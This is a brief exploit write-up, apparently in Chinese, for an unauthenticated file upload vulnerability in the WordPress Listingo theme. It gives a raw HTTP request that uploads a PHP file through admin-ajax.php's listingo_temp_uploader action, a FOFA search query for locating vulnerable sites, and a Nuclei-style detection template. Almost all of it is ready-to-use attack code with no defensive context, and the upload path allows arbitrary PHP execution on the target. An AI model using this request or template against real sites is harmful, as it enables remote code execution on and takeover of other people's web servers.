wordpress listingo 文件上传漏洞

POST /wp-admin/admin-ajax.php?action=listingo_temp_uploader HTTP/1.1Host: targetUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8rVjnfcgxgKoytcgAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Length: 531
------WebKitFormBoundary8rVjnfcgxgKoytcgContent-Disposition: form-data; name="listingo_uploader";filename="1008.php"Content-Type:text/php
<?phpphpinfo();?>------WebKitFormBoundary8rVjnfcgxgKoytcgContent-Disposition: form-data; name="submit"
Start Uploader------WebKitFormBoundary8rVjnfcgxgKoytcg--

id: wp_listingo_uploadinfo:  name: wp_listingo_upload  author: joyboy  severity: critical  description: wordpress模板——listingo 存在文件上传漏洞  metadata:    max-request: 1    fofa-query: body="wp-content/themes/listingo"    verified: true  tags: upload
requests:  - raw:      - |-        POST /wp-admin/admin-ajax.php?action=listingo_temp_uploader HTTP/1.1        Host: {{Hostname}}        Content-Type: multipart/form-data; boundary=----test        Accept-Encoding: gzip, deflate        Accept-Language: zh-CN,zh;q=0.9        Content-Length: 805
        ------test        Content-Disposition: form-data; name="listingo_uploader";filename="1008.txt"        Content-Type:text/php
        1008611        ------test        Content-Disposition: form-data; name="submit"                Start Uploader        ------test--         req-condition: true    extractors:      - type: dsl        dsl:          - 'body'        matchers:      - type: dsl        condition: and        dsl:          - 'contains((body), "wp-custom-uploader") && status_code == 200'